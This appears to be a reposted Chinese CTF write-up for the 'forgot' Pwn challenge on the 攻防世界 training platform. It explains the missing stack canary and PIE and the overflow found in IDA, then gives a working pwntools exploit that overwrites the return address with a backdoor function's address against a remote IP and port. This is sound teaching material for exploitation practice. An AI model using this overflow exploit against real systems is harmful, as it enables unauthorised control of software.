本文主要是介绍攻防世界 Pwn forgot，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

攻防世界 Pwn forgot

• 1.题目下载地址
• 2.checksec
• 3.IDA
• 4.exp

1.题目下载地址

点击下载

2.checksec

没有canary，可以随便溢出
没有PIE。可以随便使用后门函数

3.IDA

可以看到有两个溢出点
第一处限制了输入大小，我们就不管了
第二处是一个简单的溢出
只要知道需要覆盖多少byte数据就可以

接下来找到了cat flag的后门
也就是说只要把后门函数的地址直接跟在溢出数据之后就可以控制程序了

4.exp

from pwn import *

io = remote('111.200.241.244',56240)
# io = process("./forgot")
flag_addr = 0x080486CC

io.recv()
io.sendline("kk")

io.recv()
payload = "a" * 32 + "a" * 4 + p32(flag_addr)
io.sendline(payload)

io.interactive()

得到flag

这篇关于攻防世界 Pwn forgot的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！